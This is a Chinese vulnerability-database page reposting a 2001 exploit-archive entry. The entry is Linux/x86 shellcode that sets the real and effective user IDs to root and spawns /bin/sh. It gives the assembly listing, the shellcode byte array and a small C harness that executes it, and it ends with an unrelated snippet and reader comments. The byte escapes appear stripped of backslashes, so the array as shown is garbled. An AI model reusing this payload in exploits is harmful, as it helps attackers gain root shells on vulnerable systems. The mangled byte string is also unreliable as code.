Linux/x86 – setreuid(0,0) + execve(/bin/sh) Shellcode (46+ bytes)
漏洞ID | 1053531 | 漏洞类型 | |
发布时间 | 2001-05-07 | 更新时间 | 2001-05-07 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* $Id: execve-setreuid.c,v 1.1 2001/05/02 18:10:52 raptor Exp $
*
* execve-setreuid.c v1.0 - shellcode for Linux/i386
* Copyright (c) 2001 Raptor <[email protected]>
*
* This shellcode does an execve of /bin/sh
* after a setreuid(0, 0), then exit()s.
*
*/
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* ASM Code *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* ; setreuid(0, 0)
* xorl %eax,%eax
* xorl %ebx,%ebx
* xorl %ecx,%ecx
* movb $70,%al
* int $0x80
*
* ; execve(foo[0], foo, 0);
* jmp 0x1d
* popl %esi
* movb %eax,0x7(%esi)
* movl %eax,0xc(%esi)
* movl %esi,0x8(%esi)
* movl %esi,%ebx
* leal 0x8(%esi),%ecx
* leal 0xc(%esi),%edx
* movb $11,%al
* int $0x80
*
* ; exit(0)
* xorl %eax,%eax
* xorl %ebx,%ebx
* incl %eax
* int $0x80
*
* call -0x22
* .ascii "/bin/sh"
* * * * * * * * * * * * * * * * * * * * * * * * * * * * */
char code[] =
"x31xc0x31xdbx31xc9xb0x46xcdx80xebx1d"
"x5ex88x46x07x89x46x0cx89x76x08x89xf3"
"x8dx4ex08x8dx56x0cxb0x0bxcdx80x31xc0"
"x31xdbx40xcdx80xe8xdexffxffxff/bin/sh";
main()
{
int (*funct)();
funct = (int (*)()) code;
(int)(*funct)();
}
// milw0rm.com [2001-05-07]
SCO cu Vulnerability 漏洞ID 1104398 漏洞类型 Unknown 发布时间 2000-02-08 更新时间 2000-02-08 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A CVSS评分 N/A |漏洞来源 ht…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666